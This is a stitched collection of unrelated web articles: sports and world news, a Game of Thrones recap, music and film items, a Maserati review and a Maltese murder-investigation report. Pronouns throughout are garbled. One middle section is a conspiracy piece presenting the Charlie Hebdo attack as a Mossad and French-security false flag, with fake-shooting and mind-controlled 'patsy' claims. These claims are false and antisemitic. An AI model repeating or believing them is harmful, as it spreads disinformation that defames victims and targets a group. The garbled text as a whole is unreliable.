you could be on the road to become the next Jobs , Gates or Musk . Get your friends playing and compete with or against them in monthly tournaments from anywhere across the world on any mobile device . Location is Key , make every move count as you strive to become one of the Richest Real Estate Barons In The World !
International Olympic Committee vice-president John Coates scathing of Rio 2016 Games preparations
Updated
Australia 's International Olympic Committee ( IOC ) vice-president John Coates has described preparations for the 2016 Rio de Janeiro Games as the worst they have experienced .
Coates painted a dire picture of the situation in Brazil on Tuesday , labelling as `` unprecedented '' the level of attention the IOC has had to give to local organisers .
The IOC earlier this month established a taskforce involving their own staff to help speed up the project , which has been dogged by construction delays .
`` I think this is a worse situation than Athens ( in 2004 ) , '' said Coates after attending an Olympics forum in Sydney .
`` In Athens , we were dealing with one government and some city responsibilities . Here , there 's three .
`` There is little coordination between the federal , the state government and the city , which is responsible for a lot of the construction .
`` And this is against a city that 's got social issues that also have to be addressed , a country that 's also trying to deal with the FIFA World Cup coming up in a few months .
`` It 's the worst that I 've experienced . ''
Coates , who has been involved in the Olympics for nearly 40 years , has made six visits to Rio de Janeiro as a member of the IOC 's coordination commission .
Coates says Games organisers boast 600 employees - the same number as London did at the same stage in their preparations for the 2012 Games - but that they lack the necessary experience .
They say only two people are working in the Games ' test department , even though test events are schedule to start this year .
`` They 're going to try and accelerate the bringing on of staff , but we 're going to make sure we get some experienced people in there ourselves , '' they said .
`` The challenges for our ( Australian ) sport leaders and our team management is that they 're not getting answers to the questions when they go over .
`` Can they use the carparks in the village for recovery centres ? What will be the time to take from this venue to this venue ?
`` All of those things , they 're being fobbed off . No-one 's able to give answers at the moment . ''
AAP
Topics : olympics-summer , sport , australia , brazil
First posted
Note : This post contains spoilers about the latest episode of Game of Thrones .
All of their life , the bastard Jon Snow wanted one thing : to be a true Stark like their brothers and father . And in the second episode of Game of Thrones ' fifth season , King Stannis Baratheon offered to grant them that wish — and the lordship of Winterfell — in return for their loyalty in the coming wars .
Ultimately , Jon chose a bastard 's life — and their vows — at the Wall instead .
`` If I do n't take my own words seriously , what sort of lord of Winterfell would I be ? '' they ask .
Well , that 's a shame — `` Jon Stark '' sounds so good , too .
Luckily the choice paid off , and the Night 's Watch justified Jon 's loyalty by voting them — with a little urging from Sam and a smidgen of help from good old Maester Aemon — the Watch 's 998th Lord Commander . It 's what the Old Bear , former Lord Commander Mormont , would have wanted , and it felt great to see it play out on-screen .
Welcome to Dorne
Elsewhere in Westeros , we finally got our first glimpse of Dorne , the homeland of Oberyn `` The Red Viper '' Martell . Oberyn , you may recall , got their face bashed in by Gregor Clegane last season , and it turns out their brother , Prince Doran , and their lover Ellaria Sand are still salty about it .
The Martells have been nursing a grudge against the Lannisters ever since Tywin ( R.I.P . ) ordered Clegane to slaughter Doran 's sister , Elia , and their children by Rhaegar Targaryen during Robert 's rebellion two decades past . And that grudge has only intensified thanks to recent events .
That could be bad news for Myrcella — Cersei and Jaime 's daughter — who 's currently a `` guest '' at the Dornish Water Gardens . Prince Doran insists that the Martells `` do not mutilate little girls for vengeance , '' but clearly Ellaria is planning to take matters into their own hands .
`` Get it done . '' — Cersei , always . Image : HBO
In King 's Landing , Cersei is not ignorant of the danger Myrcella may be in , and Jaime has resolved to do something about it .
It was fun to watch Bronn play the doting betrothed to Lollys Stokeworth , and it 's a shame that Jaime had to come and ruin their plans . But hopefully it will be even more fun watching the two of them sneak and slash their way into Dorne .
The Mad Queen ?
Dany has their own problems , and the situation in Meereen is getting worse , not better . Drogon 's surprise reappearance — and sudden re-departure — might herald things to come , but for now the black dragon has no help to offer their mother . Tyrion , too , might have been able to offer Dany some sage counsel this episode , but they and Varys remain on the road .
Oh , hey , Drogon . Image : HBO
And the Dragon Queen clearly missed the point of Barristan 's story about their father Aerys .
It turns out the king that Robert usurped before the series began earned their most enduring title .
`` The Mad King gave their enemies the justice they thought they deserved , and each time it made them feel powerful and right , '' Barristan tells Dany . `` Until the very end . ''
Yet when a member of their own inner circle , the freed slave Mossador , begs for their mercy , they choose the justice they think they deserve , turning the people of Meereen against them in the process . Dany is clearly walking a fine line here , and it 's uncertain what kind of ruler she 's becoming .
Chance encounters
But it was Arya 's storyline that gave this episode its name , `` The House of Black and White . ''
The youngest Stark daughter has been through the grinder and come out harder and more determined than any of their family members would have guessed they could be . But the big question for Arya going forward will be whether they can leave their roots behind and become `` no one '' through their training at the House of Black and White , the Braavosi temple dedicated to the god of death .
Is Arya ready for a new life ? Image : HBO
Arya 's reunion with Jaqen H'ghar , the Faceless Man who helped them escape from Harrenhal during season 2 , was a long time coming . But their presence here was a surprise for readers .
In the books , Arya 's master in Braavos is an old priest they think of as the Kindly Man , and fans have long speculated that he 's actually Jaqen . The assassin 's grumpy old man disguise was a nice nod to that theory , though it does n't prove anything — as we 've already seen this season , the show definitely =/= the books .
That became evident yet again when Brienne and Pod finally ran into Sansa , the latest in a long string of eye roll-inducing coincidences unique to the show . Constantly having important characters accidentally run into one another is an effective way to make any fictional world — even one as big as Game of Thrones ' — feel small , no matter how convenient it is as a plot device .
Luckily it does n't change too much about the story , because Sansa — their newfound confidence tipping over into full-on arrogance — rejects their mother 's former sworn sword with barely a thought . I have a feeling she 's going to come to regret that , but who knows ? We 're in totally uncharted territory here .
This episode had a few pay-offs , but like the season 5 premiere it focused more on setting up future storylines . Jaime is headed to Dorne , but we still do n't know where Sansa and Littlefinger are going . And although Brienne and Pod made a bloody escape , their path from here is murky .
At the Wall , Gilly and Shireen Baratheon had a conversation about the disfiguring disease Greyscale that was just a bit too long to not be important later .
And Stannis revealed to Jon that he 's having trouble winning the Northern houses over to their cause despite their saving the Night 's Watch . ( That letter from 10-year-old Lyanna Mormont — `` Bear Island knows no king but the King in the North , whose name is Stark '' — is a favorite line from the books ) .
All the while , Arya 's list of foes is getting shorter and shorter . Wonder who she 'll cross off next ?
BONUS : The `` Game of Thrones '' fan theory the Internet is talking about
Indications that the Paris Attack was an inside job , involving Mossad and the French security services :
1 .
The journalists from Charlie Hebdo only gather in their Paris office once per week .
`` A Charlie Hebdo reporter told the French newspaper Le Monde that the attackers had to have been informed that the editorial meeting was taking place , otherwise there are not many people on the premises . ''
Who would have informed the shooters about the meeting on that day ?
2 . There were police INSIDE the Charlie Hebdo offices BEFORE the attack took place .
`` Two officers who had been assigned to protect editor and cartoonist Stephane Charbonnier for the past several years came down from an upper floor and intercepted the gunmen . ''
Confusion as French hunt magazine attack suspects There were police INSIDE the Charlie Hebdo offices BEFORE the attack took place . `` Two officers who had been assigned to protect editor and cartoonist Stephane Charbonnier for the past several years came down from an upper floor and intercepted the gunmen . ''
How is it that the police seemed so useless ?
Srangely , there were no armed police outside the offices .
3 . There were heavily armed police in the vicinity and all over the centre of Paris .
`` Outside the building , as the gunmen tried to flee in their Citroën van , three officers in a police patrol car intercepted them . A journalist at Charlie Hebdo let the gunmen into the heavily protected offices.Srangely , there were no armed police outside the offices.There were heavily armed police in the vicinity and all over the centre of Paris . `` Outside the building , as the gunmen tried to flee in their Citroën van , three officers in a police patrol car intercepted them .
`` Two suspects got out of the van ...
`` An officer ... ran toward the suspects . But the officer was shot and wounded by the suspects . They were executed with a shot to the head as they lay on the sidewalk . ''
Confusion as French hunt magazine attack suspects
After this police officer was 'shot ' in the head with blanks , there is no sign of blood .
There are 3 different accounts of whom this police officer was .
In one account they an officer who emerged from a police car .
In another account they are a police officer who came out of a police station .
And in a third account they are a police officer who was on a bicycle .
..
CanSpeccy alerted us to this video . Google keeps on censoring this affair , so here it is on LiveLeak.com - Charlie Hebdo police officer shooting zoomed in ... After this police officer was 'shot ' in the head with blanks , there is no sign of blood.There are 3 different accounts of whom this police officer was.In one account they an officer who emerged from a police car.In another account they are a police officer who came out of a police station.And in a third account they are a police officer who was on a bicycle ...
Google has been removing the videos that show this fake shot .
4 . `` After killing the officer , the gunmen returned to their car , shouting , 'We avenged the Prophet Muhammad , ' the source said . ''
The purpose of this source would appear to be to label the gunmen as Moslems , rather than assets of Mossad and the French government .
5 . Mossad and the French security services appear to have had their posters printed in advance ?
Confusion as French Hunt Magazine Attack Suspects
Amchai Stein , the deputy editor of Israeli IBA Channel 1 , just happened to be at the scene and has been posting photos of the shooting .
The whole purpose of the CIA-Mossad-NATO Operation Gladio was to scare the citizens of France and Europe . , the deputy editor ofIBA Channel 1 , and has been posting photos of the shooting.The whole purpose of the CIA-Mossad-NATO Operation Gladio was to scare the citizens of France and Europe .
..
6 . In false flag attacks , the alleged terrorists allegedly leave behind identity cards or passports .
7 . In false flag attacks , the authorities often give conflicting evidence .
`` Two senior U.S. counter-terrorism officials told NBC News that one of the suspects in the attack had been killed and that two others were in custody . ''
Confusion as French hunt magazine attack suspects In false flag attacks , the alleged terrorists allegedly leave behind identity cards or passports.In false flag attacks , the authorities often give conflicting evidence . `` Two senior U.S. counter-terrorism officials told NBC News that one of the suspects in the attack had been killed and that two others were in custody . '' ..
8 . In false flag attacks , the security services need 'patsies ' .
The French authorities have named the 'patsies ' as Said Kouachi , Cherif Kouachi and Hamyd Mourad .
Several of Hamyd 's school friends have taken to Twitter saying they were in class with them at the time of the attack . In false flag attacks , the security services need 'patsies'.The French authorities have named theas Said , CherifandMourad.Several of Hamyd 's school friends have taken to Twitter saying they were in class with them at the time of the attack .
nst.com.my/node/68945
The Kouachi brothers have secular ( non religious ) backgrounds
nytimes
Said Kouachi , 34 , and their brother Cherif , 32 , were orphans who were brought up in a care home in Rennes in northern France .
dailymail .
The CIA and its friends like to mind-control orphans from children 's homes to turn them into useful patsies .
The brothers had menial jobs such as pizza delivery man , and shop assistant . The Kouachi brothers have secular ( non religious ) backgroundsSaid Kouachi , 34 , and their brother Cherif , 32 , were orphans who were brought up in a care home in Rennes in northern France.The CIA and its friends like to mind-control orphans from children 's homes to turn them into useful patsies.The brothers had menial jobs such as pizza delivery man , and shop assistant . The 'patsies ' were probably in custody before the attack .
What was the purpose of the 7 January 2015 attack on the offices of the satirical weekly Charlie Hebdo by assets of Mossad ?
Charlie Hebdo has reportedly made fun of the Mossad agent Abu Bakr al-Baghdadi ( Simon Elliot ) .
Mossad reportedly wants revenge for :
French MPs voting in favour of a Palestinian state
France voting against Israel at the UN
CanSpeccy alerted us to this video which apparently shows the fake shooting of the police officer .
Does the shooting of the police officer look totally fake ?
Amchai Stein , the deputy editor of Israeli IBA Channel 1 , just happened to be at the scene and has been posting photos of the shooting .
`` Two black-hooded men entered the building with Kalashnikovs . A few minutes later we heard lots of shots , '' a witness told local TV station iTele , adding that the men were then seen fleeing the building .
The attackers spoke perfect French and reportedly said that they support the CIA militia called al Qaeda .
Charlie Hebdo 's editor-in-chief Gerard Biard escaped the attack because they were in London .
The Telegraph 's David Blair writes that the Paris gunmen showed advanced military skills The gunmen who killed 12 people in and around the office of Charlie Hebdo magazine in Paris acted with a skill and calmness that bears all the hallmarks of advanced military training . ''
Nathan Cirillo
Ahmed Merabet
Nathan Cirillo
Ahmed Merabet .
, the deputy editor ofIBA Channel 1 , and has been posting photos of the shooting . `` Two black-hooded men entered the building with Kalashnikovs . A few minutes later we heard lots of shots , '' a witness told local TV station iTele , adding that the men were then seen fleeing the building.The attackers spoke perfect French and reportedly said that they support the CIA militia called al Qaeda.Charlie Hebdo 's editor-in-chief Gerard Biard escaped the attack because they were in London .
... The above video shows that the security services did the false flag attack in Paris.The Paris Attack is a psy-op ... Sasha Reingewirtz , 28 , president of the Jewish Students Union , said of the killers : '' They want to scare French citizens . `` The objective of the attack is to turn public opinion in favour of Israel ..... Twelve people , 10 journalists and two police officers , were reportedly killed .
Image copyright Reuters Image caption Deraa , in southern Syria , is among the cities devastated by the conflict
A ceasefire brokered by the US and Russia has come into force in south-western Syria .
It was announced after Presidents Donald Trump and Vladimir Putin met for the first time at G20 talks on Friday . The truce is also backed by Jordan .
It is in force along a line agreed by Syrian government forces and rebels .
About 300,000 people have been killed in Syria 's conflict , which began with protests in 2011 . Another 11 million have been forced from their homes .
Russia and the US have backed opposing sides , with Moscow supporting the Damascus government while Washington has called for the removal of Syrian President Bashar al-Assad .
Russian forces and a US-led coalition have been carrying out air strikes in their respective campaigns .
The ceasefire , which Russia has said covers the regions of Deraa , Quneitra and Sweida , was reported to result from months of undisclosed talks between Russian and US officials .
Speaking after the meeting between Mr Putin and Mr Trump in the German city of Hamburg , US Secretary of State Rex Tillerson said : `` This is our first indication of the US and Russia being able to work together in Syria . ''
Mr Tillerson said Friday 's meeting also showed that the two countries eventual aims for Syria were `` exactly the same '' - but they differed on how they should be achieved .
Back in the 90s and early years of the new millennium , J-Pop was sitting on top of the world as the most sought-out music originating from the East Asian market . A lot of their popularity had to do with its association with Japanese animation , better known as anime . Along with the Japanese gaming industry , many songs from J-Pop artists became popular among a large cult following especially in North America and Europe . It is even safe to say certain J-Pop artists themselves became popular , not just their music . The J-pop girl group Perfume has been prominent since their debut back in 2000 . Utada Hikaru is a soloist known for their featured songs in video games like Kingdom Hearts and anime like Evangelion : 3.0 You Can ( Not ) Redo .
Sadly , J-Pop has lost a lot of its international luster after 2002 and a lot of its failure has to do with the fact that Japan does a lot of their business internally , not internationally . What this means is they will always cater to their small local preferences over the much larger international scene . In this case , it is the Otakus – people , primarily Japanese , with obsessive interests in anime , manga , video games , and J-pop and often have a say in its direction – who are at fault .
As a result , J-Pop suffered internationally because it mostly attained attraction through both the anime and video game industries in which the songs themselves have an emotional connection with said media . J-Pop on its own is very hard for the Japanese to market internationally because they do not take popularity cues from the most popular musical markets are five years to a decade behind the times . Also , they too follow the same “ slow killing ” trend of not appealing to international markets .
BABYMETAL is the most-popular J-Pop group to come out of Japan recently . They are unique for being a hybrid of metal with idol elements . [ Photo by Mike Pont/Getty Images ] Still , there is one J-Pop act that is dominating despite the situation the J-Pop industry is in now internationally . This act is known as BABYMETAL and they are extremely popular . The question is why is the hybrid J-Pop and metal girl group the most popular J-Pop act internationally ?
For those who do not know , BABYMETAL is technically a risky concept . Prior to BABYMETAL coming to existence , the members Suzuka Nakamoto , Yui Mizuno , and Moa Kikuchi were better known for being part of Sakura Gakuin , a well-known “ junior high school ” group in J-pop in which its members constantly change through being “ enrolled ” or “ graduating. ” They primarily sing traditional bubble gum J-Pop often associated with their concept , but change it up time to time .
Eventually , the label in charge of Sakura Gakuin wanted to create a sub-unit of the group . They utilized the popular international musical cues of metal music , repackaged it along with idol music , and started to promote the songs not just to the Japanese , but to a wider audience . It also helped that the three members of the group were willing to learn and adapt to metal music , a genre they were previously unfamiliar with . They even went by new stage names , Su-Metal ( Suzuka Nakamoto ) , Yuimetal ( Yui Mizuno ) , and Moametal ( Moa Kikuchi ) .
BABYMETAL was born and to initiate their presence in the J-pop music industry , they released their debut song titled “ Doki Doki Morning ” back in April of 2011 . They then uploaded a live music video on YouTube back in October of 2011 . They were able to attract 1 million views by the end of 2012 .
For the next three years , BABYMETAL would keep doing their thing , creating original music that did not follow the rest of the J-Pop music industry and promoting locally and internationally . By 2014 , the year they signed on to a major label , they had such a following that the release of their first official studio album not only received praise from critics , but sold over 37,000 copies in Japan alone . Online sales , however , were huge as it reached No . 4 on Oricon and No . 2 on Billboard Japan . It also topped iTunes Metal charts in Germany , the United Kingdom , and the United States . Their highest achievement was entering the U.S . Billboard 200 at 187 . Take note that it is extremely rare for any Japanese musical act to even make it on such a chart .
At this point , one probably understands why BABYMETAL is the most-popular J-Pop group internationally . BABYMETAL and the labels that take care of them are following a formula , as mentioned earlier , of taking on musical cues from the top music industries with the biggest international influence , repackage it to make it their own , and promote it back not just locally but internationally . That formula has been utilized for many years by the K-Pop music industry and it almost guarantees musical superstars in their sake . Ergo , the success-to-failure rate is so favorable that other East Asian countries ' music industries , especially China and the Philippines , are utilizing it as best as they could too .
As for BABYMETAL , they recently released their second studio album titled Metal Resistance on March 29 of this year . BABYMETAL will also go on another world tour too in which numerous concerts in the United States are scheduled for both May and June .
[ Photo by Danny E. Martindale/Getty Images ]
The family of the murdered Maltese journalist Daphne Caruana Galizia , who was a relentless critic of corruption in the country , are taking legal action against the police force for allegedly failing to ensure the investigation into their killing is impartial and independent .
Caruana Galizia was killed on 16 October after their rental car was blown apart by a powerful explosive device .
Them family are suing Malta 's chief of police on the grounds that the investigation is being overseen by a senior officer who is married to a top government minister , and who was themselves the subject of a critical report by Caruana Galizia .
Lawyers acting for the family wrote to the police commissioner at the weekend demanding that their deputy , Silvio Valletta , be removed from the case within three days . After receiving no response , they filed a lawsuit on Wednesday at Malta 's constitutional court calling for their removal .
Daphne Caruana Galizia obituary Read more
Valletta is married to Justyne Caruana ( no relation to the journalist ) , who was promoted by the prime minister , Joseph Muscat , to minister for the island of Gozo in June .
Under the European convention on human rights , states are obliged to run independent and objective investigations into any murder .
“ The involvement of the deputy commissioner , Silvio Valletta , violates the independence and impartiality of any investigation into the loss of life , ” the family claimed in their court filing .
They alleged the police were not keeping them informed of progress , while stories were being “ fed to newspapers ” .
The court filing claims Caruana Galizia 's murder was a “ targeted killing ” of a journalist whose work focused on politicians who are members of the same cabinet as the wife of the deputy commissioner .
It alleges the journalist had uncovered “ corruption , criminality , conflicts of interest and ethical failures in decision making ” by politicians and their associates .
They had also been critical of the failure of Malta 's anti-money-laundering agency , the Financial Intelligence Analysis Unit , to take action on allegations , the filing states . Valletta serves on the board of the FIAU , a fact highlighted by Caruana Galizia in May .
The police department did not respond to questions about the merits of the legal claim or whether Valletta 's work on the case threatened the independence of the investigation .
Caruana said in a statement emailed to the Guardian that they would not comment on the family 's legal claim or who ought to investigate the case : “ What matters is that there is total commitment from everyone involved to see this case solved in the shortest time possible . ”
Caruana said they had been an MP since 2003 and their husband had been a police inspector since 1993 .
“ Both of us have always acted professionally in our respective roles and our integrity was never put in doubt or question . We always kept work separate and distinct from our private and married life .
“ My husband has worked under different administrations and their loyalty was always to the police force and the state . ”
The most significant investigations by the murdered journalist stemmed from the Panama Papers , a leak of documents from the archives of the offshore law firm Mossack Fonseca .
They used the data to uncover a number of offshore companies apparently linked to Muscat 's energy minister and their chief of staff . They also claimed Muscat 's wife was the beneficial owner of the offshore company Egrant . On their blog , they alleged that a series of payments , in the form of loans , had been routed to Egrant , and that the money had come from an account ultimately belonging to the daughter of Azerbaijan 's president , Ilham Aliyev . Azerbaijan has a valuable contract to supply gas to Malta .
All those named deny any suggestion of wrongdoing , and Muscat has described the allegation against their wife as “ fabricated ” . They have pointed out that no document proving the allegations has been published or handed to a magistrate .
Muscat and their associates filed libel suits against Caruana Galizia before their murder . They are cooperating with two separate judicial inquiries into the Panama Papers allegations , which have yet to conclude .
Valletta 's marital relationship with a serving minister has been the subject of scrutiny in the past , but the current police commissioner , Lawrence Cutajar , has denied the existence of a conflict of interest . There is no evidence that Valletta 's political connections have interfered in the current investigation .
Valletta , who has been an officer for more than 20 years , has oversight of the criminal investigations department , the drug squad , counter-terrorism , and the financial crimes unit , among others .
Opposition politicians asked in the Maltese parliament earlier this month whether it was appropriate that a minister 's husband was leading the investigation into the murder of a harsh critic of the government . Simon Busuttil , who was leader of the opposition Nationalist party until June , told the parliament they were not questioning Valletta 's professionalism , but that in view of the sensitivity of the case justice had to be done , and be seen to be done .
Malta 's government is offering a €1m reward for information relating to the killing , and the inquiry is being assisted by agents from the FBI and forensics experts from the Netherlands .
The family have raised a number of concerns about the investigation , saying inquiries appear to be focusing only on forensic evidence , rather than examining financial transactions that could uncover vital evidence .
They also suggest leaks from within the police are potentially intimidating those who might come forward with information . These include news that Caruana Galizia 's phone had been recovered from the scene of the explosion .
Politicians across Europe have questioned the rule of law in Malta , the smallest of the European Union 's member states .
This month Frans Timmermans , the first vice-president of the European commission , issued a strongly worded warning .
Responding to a public letter from eight of the world 's largest media organisations , including the New York Times , the BBC and the Guardian , they said : “ The eyes of Europe are on the Maltese authorities … We want those directly and indirectly responsible for this horrible murder to be brought to justice .
“ And we want the investigations to run their full course , so that any other related wrongdoings that may emerge can also be prosecuted and potential structural problems be resolved . ”
Former prefect of the Vatican 's Congregation for Divine Worship and current archbishop of Valencia , Spanish Cardinal Antonio Cañizares , is being charged of hate crime after an alleged homophobic speech delivered in their sermon May 13 at the Catholic University .
( Wikimedia Commons ) Antonio Cardinal Cañizares Llovera after an audience in the Vatican City State
`` We have legislation contrary to the family , the acts of political and social forces , to which are added movements and acts by the gay empire , by ideologies such as radical feminism , or the most insidious of all , gender ideology , '' Cañizares said in their homily , as reported by LifeSiteNews .
The Feminist Platform of Alicante submitted an official request on Friday , June 3 to the Spanish government to prosecute the cardinal for `` inciting discrimination and hatred '' in their May 13 sermon .
`` We ask the administration and the prosecutor 's office not to leave those comments unpunished , '' said the feminist group 's Coordinator Yolanda Diaz .
The group also stated they would not be content with a mere apology from the cardinal , LifeSiteNews reported .
Other supporters of the lesbian , gay , bisexual and transgender ( LGBT ) and feminist organizations including Lambda , the LGBT Collective of Valencia , the Collective for the Sexual-Affective Diversity , and the Association of Families with Transsexual Minors also announced their intent to file an official complaint , according to Crux .
Ximo Puig , the governor of Valencia , added their voice to the backlash against the cardinal whom they accused of `` fomenting hatred . '' The governor said that `` the whole world understands that each person can love whom they want . ''
In response to what Cañizares referred to as `` censorship and condemnation , '' the cardinal decided to publish their homily while calling on `` objective '' lawyers to assess their speech .
They asked , `` Is it homophobic to defend the family ? ''
Cañizares also likened the censure and condemnation to a particular period in Spanish history when the Catholic clergy were persecuted by socialists .
On the other hand , supporters of the cardinal argued that Cañizares was only `` defending the family amidst the challenges the pope talks about '' in the alleged homophobic speech titled `` In defense and support of the family . '' They even cited Pope Francis ' document `` Amoris Laetitia '' released last year as similar to the one delivered by the cardinal .
The official website for the new Evangelion films began streaming a promotional reel for the Blu-ray Disc and DVD release of the Evangelion : 3.0 You Can ( Not ) Redo film on Wednesday .
The third part in Hideaki Anno and Khara 's four-film version of Gainax 's Neon Genesis Evangelion series will ship on Blu-ray Disc and DVD next Wednesday . Similar to the previous films , the third film has been renamed `` Evangelion : 3.33 You Can ( Not ) Redo `` for its home video release .
Both the Blu-ray and the DVD will contain the 95-minute feature itself and the 10-minute , 7-second `` Kyoshinhei Tokyo ni Arawaru '' ( Giant God Warrior Appears in Tokyo ) short . The live-action tokusatsu ( special-effects ) short was developed by Anno , produced by Studio Ghibli , and screened with Evangelion : 3.0 You Can ( Not ) Redo film in theaters . Both home video versions will also have the Rebuild of Evangelion:3.33 documentary , the teaser trailer , the full trailer , the television commercials , and the `` 3.33 ver . '' of the dialogue recording script .
The Blu-ray will have the Japanese soundtrack in Linear PCM 5.1ch and Linear PCM 2.0ch , while the DVD will have the Japanese soundtack in Dolby Digital/5.1ch and Dolby Digital/2.0 Surround . ( The extras on the Blu-ray and DVD will be in Linear PCM 2.0ch and Dolby Digital/2.0 Surround , respectively . ) Both versions will have Japanese subtitles .
King Records will offer the Blu-ray for 6,090 yen ( about US $ 66 ) at retail , while the DVD version will retail for 5,985 yen ( US $ 65 ) . Each will come in Digipak packaging with a special box and a 66-page booklet . The first copies of each will also bundle an original soundtrack CD with Hikaru Utada 's theme song `` Sakura Nagashi . ''
[ Via NicoTubeAnime ]
The last time we tested an Audi SQ5 ( 578 pounds lighter ) , it ran a 4.8-second 0-60 and a nearly identical 13.5-second/102.2 mph quarter mile . Similarly , the Porsche Macan S ( 584 pounds lighter ) sprinted to 60 mph in 4.9 seconds and across the quarter mile in 13.5 seconds at 102.1 mph . A relative newcomer with sporting credentials , the Jaguar F-Pace S ( 498 pounds lighter ) fell a little short with its 5.4-second 0-60 and 13.9-second/99.7-mph quarter-mile pass . Finally , even heavier than the Levante , the 5,109-pound Mercedes GLE 450 AMG Coupe sprinted 0-60 in 5.1 seconds with a 13.8-second/99.1-mph quarter mile . Would n't this make a great comparison test ?
The problem with this comparison , however , is that the dimensions and prices are all askew . Aside from comparable acceleration , the Audi , BMW , Jaguar , and Mercedes-Benz are much less expensive and have shorter wheelbases , but they do have similar cargo capacities . Upsizing them with X5/X6 xDrive35i , GLE 400 SUV , and Cayenne S would provide almost-matching prices and dimensions , but they would not be able to match the pace of the Levante . With performance , it compares very well to the little guys . When it comes to price , size , and panache with the big guys , we 're in a bit of a quandary as to how to properly compare the Maserati . The Levante has managed to carve out a unique spot for itself , and maybe that 's the idea .
Riding on Air ; Steering with Fluid
Aside from how quick it is , how does it drive ? Depending on drive mode and road surface , our staff was divided on the Maserati 's ride comfort versus handling balance . With the Levante 's all-aluminum A-arms front and multilink rear suspension and riding on six-way height-adjustable air springs ( five while driving , one while parked ) , plus electronically controlled dampers , most reviews of ride comfort were generally positive . Almost always controlled and composed , even riding on optional staggered-width 21-inch Pirelli P Zeros with short sidewalls , the distinction among the modes was detectable and appreciated on L.A. 's choppy concrete freeways—no more or less acceptable than any similar sport-oriented utility vehicles .
What was n't appreciated was a hyperactive engine auto-stop/start in normal drive mode . Merely executing a legal , full stop at a stop sign would kill the engine . ( You can defeat this with Sport mode or in a byzantine IP menu , but it 's not retained upon restart . ) Also , those open exhaust baffles in Sport mode grew tiresome . Expected and welcome noise at full throttle becomes an annoying drone at half throttle . Dear Maserati , something really needs to be done with the shifter . We first noticed on the last Quattroporte S we tested and hoped it would 've been addressed with the new Levante . However , shifting in either direction between drive and reverse is an exercise in frustration . Without distinct detents , sometimes one gets park , reverse , neutral , or drive but rarely on the first try and especially not when hurried during a three-point turn—like during our photo shoot in busy downtown . Also like the Quattroporte sedan , the otherwise-welcome column-mounted shift flippers , ahem , paddles require yuge hands to reach the turn-signal stalk .
But true to its mission , the Levante SQ4 does feel like a rear-driver , especially because it 's one of the last vehicles to still use hydraulic- and not electric-assist power steering . We were very impressed with the SQ4 's grip and poise when the road twisted and turned . One would never guess the Levante weighed as much as it does . There 's definitely a fluid , unfettered quality and genuine feel in the steering that many young drivers today will likely never experience . And with 2.7 turns lock to lock and a tidy 38.4-foot turning diameter , the Levante really does drive smaller than its 118.3-inch wheelbase would seem to dictate . On our taxing figure-eight course , the Levante SQ4 beat the 25.9-26.2-second range established by the Audi SQ5 , the Jaguar F-Pace , and the Porsche Macan S with its own 25.5-second lap . The GLE 450 AMG turned a slightly better 25.3-second time , and a Macan Turbo finished in 25 seconds flat . In terms of braking power , the Levante 's 105-foot stop from 60 mph lands square in the middle of the 104-107-foot range of the others .
International Interior
Due to that long wheelbase , Levante seating accommodations are generous ( at the expense of ultimate cargo capacity ) , and leather seats ( heated up front ) are standard . Our Levante was further equipped with the optional front sport seats , which offered exceptionally good side bolstering without sacrificing comfort . Within luxury and sport packages , color choices and trims are initially offered in a dizzying 28 combinations . We think our somber black leather with red stitching and carbon fiber did n't do the Levante any favors . Sure , the quality of the genuine articles is evident , but we 've seen the tasteful two-tone leather treatments , and any of the four wood trims would have been more in character with a sexy Italian .
If you 've seen the dashboard layout of either the Ghibli or Quattroporte , then the Levante will look familiar right down to the analogue gauges flanking a crisp LED information panel and the requisite clock jewelry . An attractive , compact , and easy-to-use center stack is dominated by the SQ4-standard 8.4-inch touchscreen display with navigation . If you 've been in a recent Chrysler , Dodge , or Jeep , then you 'll also recognize the infotainment system . Which is fine , but the same switchgear , power-seat/window/mirror assemblies , headlamp switch , push-button ignition , and power rear hatch button ? Not to mention , we were also a bit put off by some plasticky bits and poor dampening of storage cubbies . Some controls are illogically scattered and labeled . These low-rent touch points immediately sour an $ 84,250 ( $ 98,550 as tested ) luxury car . But this does n't explain how there were four power points in two sizes , yet none were the correct diameter for our phone charger . Luckily , there are multiple USB ports in both the front and rear . We also had a poltergeist , which would intermittently cycle the heat on the driver 's seat and roll the rear window up and down , somehow convinced there was a `` pinch '' problem . Finally , sight lines , as they are in most SUVs , were challenging . We 'd recommend the Advanced Driver Assistance package , which supplements standard blind-spot monitoring with adaptive cruise control with full-stop and go , forward collision warning , lane departure warning , and a surround-view camera . And there 's just no way to see through the three , large rear headrests when looking in the mirror . We also found the low-beam headlights too dim to properly illuminate a darkened road at speed .
Cargo , Towing , Dirt Roads
View 39 Photos
Rear seats fold in 60/40 fashion ( the larger side also features a ski pass-through ) and lie almost flat , which expands cargo from 19.4 nominal , to 57.3 maximum cubic feet . Like we said at the top , these measurements better align with midsize competitors than larger ones . We appreciated the standard power hatch ( with optional kick sensor ) but also noticed that there is n't a rear-seat release in the cargo area . Even base Honda CR-Vs have this . The Levante SQ4 is rated to tow a pretty significant 5,952 pounds , which is more than most sporty midsizers but less than their upsized sometimes-V-8-powered brethren . There 's also a standard trailer-sway control built into the ESP .
We did n't have an opportunity to test it in dirt and muck , but after engaging automatic off-road mode , the ground clearance increases by 1.6 inches ( to a height of 9.7 inches ) , and the transmission alters its shift schedule for different types of terrain . While in off-road mode , the electronic stability system also runs a different program , and the Levante will automatically climb and descend hills at a prescribed speed . When they first drove a Levante on its introduction , senior features editor Jonny Lieberman said it was `` surprisingly capable and sure-footed '' through muddy ruts and mild off-road situations .
Not a Poseur
If the Levante plan works , and we think it will , Maserati will easily meet its 30,000-unit sales target . There are probably that many brand-conscious buyers alone looking to one-up their Audi- , BMW- , Jaguar- , Mercedes- , and Porsche-driving neighbors . The good news is that the Levante is n't merely a luxury branded product . It 's also an extremely competitive driving machine that is , at minimum , on par with the best in the segment , sometimes out front . Those familiar with the qualities expected in this lofty price range , however , might find the Levante lacking in certain ways . Luckily , most newcomers will be too distracted by the Maserati 's genuine pace , poise , and panache to notice . Maserati got the hard stuff right : the design and the driving . We 'll have to wait and see if they can upgrade and improve some of the rest .
Xinhua , February 17 , 2012
By Abdul Haleem & Chen Xin
`` I have knocked any door to get rid of violence but all of my complaints have fallen to deaf ears . Instead , the prosecutor accused me of lying and warned me of dire consequence , '' a woman named Sadat revealed their ordeal in a weak voice while receiving treatment in Herat hospital .
The bandaged wrapped image of the young woman showed by the private Tolo television on Wednesday tells of the nightmare they had faced in their in-laws home .
Sadat , 15 , is a native of Herat province 640 km west of Afghan capital Kabul . They married a man five months ago , hoping to start a happy new life .
